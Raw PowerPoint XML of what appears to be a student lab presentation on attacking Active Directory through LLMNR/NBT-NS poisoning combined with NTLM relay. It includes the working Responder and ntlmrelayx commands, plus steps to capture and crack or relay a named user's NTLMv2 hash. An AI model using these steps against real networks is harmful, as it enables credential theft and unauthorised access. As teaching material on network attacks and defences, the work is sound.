                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Building of Website </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="149059">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2600" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="14905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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="918378">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="2600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Log Poisoning</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="14905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600" i="1" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="14905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918378">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-SG" sz="2600" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Local File Inclusion</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="149059">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2600" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="14905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r h="918378">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Presentation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="14905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600" cap="none" spc="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="14905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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="918378">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Report</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="149059">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lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2600" b="0" i="0" u="none" strike="noStrike" cap="none" spc="0" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2600" cap="none" spc="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="405864" marR="312203" marT="312203" marB="14905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1760623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4C7C-0B48-1908-B84B-97B909070A7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420465" y="109728"/>
            <a:ext cx="5575124" cy="1411224"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2700" u="sng" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Attack On Active Directory Using the LLMNR/NBT-NS Poisoning.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2700" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="2700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E764E5BA-C67F-9FAF-F147-59F07B6F912E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420464" y="1360930"/>
            <a:ext cx="5575123" cy="5387341"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are Windows networking protocols used for name resolution when DNS fails. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name Resolution Failure: When a system cannot resolve a hostname using DNS, it falls back to LLMNR or NBT-NS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker Responds: A malicious actor on the network listens for LLMNR/NBT-NS queries using tools like Responder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Poisoning the Response: The attacker falsely claims to be the requested hostname and tricks the victim’s system into sending authentication requests to them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential Theft: The victim sends an NTLMv2 hashed password to the attacker's machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A computer screen with arrows pointing to a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65E61B75-F27C-2E9D-8803-EB1C6C2E86AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="196411" y="420624"/>
            <a:ext cx="6224054" cy="632764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85305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7640DEC-97A2-496C-B454-5B165BB6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9C9AF-E459-37AE-08E3-18101EC75F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="246890"/>
            <a:ext cx="3585975" cy="2538104"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>LLMNR/NBT-NS Poisoning</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{726D2BF2-DA84-83A9-19B2-062DE0422CBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4920225" y="246889"/>
            <a:ext cx="6628583" cy="2538104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>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Open the responder on the attacker machine,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>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Command used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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sudo</a:t>
            </a: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responder -I eth0 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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dwv</a:t>
            </a:r>
            <a:endPar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Fake a file share access \\ShareFiles to the Active Directory from AD joined machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>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Check the attacker responder terminal we will get the NTLMv2 hash of the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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peterlim</a:t>
            </a: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p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>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We can crack this hash using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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hashcat</a:t>
            </a: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to get the password but if the password is too complex cracking may take too much time and complexity so to get rid of this situation, we must combine the NTLM relay attack with LLMNR/NBT-NS Poisoning.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38ACE9E4-07F3-CAE6-823F-2C2B1FD22524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect r="3922" b="3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2880360"/>
            <a:ext cx="3585975" cy="3977640"/>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D0BFE3E-C6D8-48C0-CFFB-4775F41D9660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="7658" r="33566" b="4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3930034" y="3031882"/>
            <a:ext cx="3092558" cy="3626243"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17" descr="A computer screen with numbers and letters&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E43A71B-653A-7647-D79E-CC70E2BE416B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5464" r="53258" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7507105" y="3648456"/>
            <a:ext cx="4567241" cy="1895858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D7975EE-C13F-5957-5BE1-24AD578E97F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="2666999"/>
            <a:ext cx="657368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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{508970FC-D269-2745-BFFA-7F1802CD5977}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706624" y="5221224"/>
            <a:ext cx="122341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D84517E-AA5B-9A52-E804-190C68BD7A1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7022592" y="4998061"/>
            <a:ext cx="48451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138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8056A-7A19-BA36-430E-44DC2D2F5BAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="962022" y="643467"/>
            <a:ext cx="4340023" cy="5571064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3700" u="sng">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Attack On Active Directory Using the LLMNR/NBT-NS Poisoning combined with NTLM Relay Attack.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3700">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" sz="3700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71477AEE-BFFB-4DA5-3AB2-438F87CCAB98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6708499" y="643467"/>
            <a:ext cx="4521480" cy="5571064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM relay is an attack where an attacker captures NTLM authentication requests and forwards (relays) them to another system without cracking the NTLM hash. If the relayed authentication is accepted, the attacker can gain access to the target system as the victim user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack works because NTLM authentication does not verify where the authentication request originated from.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1536315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7640DEC-97A2-496C-B454-5B165BB6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C581DF-1C43-9208-8430-5E0C5C2F1F23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1033273" y="109728"/>
            <a:ext cx="10133234" cy="2916936"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>	Open the responder on the attacker machine,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>	Command used: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> responder -I eth0 –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>dwv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>  Open NTLM Relay on another terminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> 	Command used: python3 ntlmrelayx.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>tf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> targets.txt -smb2support </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>   Fake a file share access \\ShareFiles to the Active Directory from AD joined machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38ACE9E4-07F3-CAE6-823F-2C2B1FD22524}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect r="3922" b="3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="834198" y="3026663"/>
            <a:ext cx="2704624" cy="381713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4B7F5DE5-39BC-C41D-BC37-34BEA9E04761}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationI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dtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock"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o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns:lc="http://schemas.openxmlformats.org/drawingml/2006/lockedCanvas" id="{6AE26364-CC99-6E48-66C2-FF112F459668}"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1671" r="56529"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4107433" y="2984042"/>
            <a:ext cx="2855534" cy="3859751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43E5AB75-9D94-A65E-539C-C44B82C492CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3538822" y="4854550"/>
            <a:ext cx="56861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AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D374D127-E4DE-04B9-CE40-7283E8896C0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="17089" r="4" b="28788"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7627873" y="3831337"/>
            <a:ext cx="4344414" cy="1868171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD60AA0C-B975-11D0-0ECE-579F47023AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
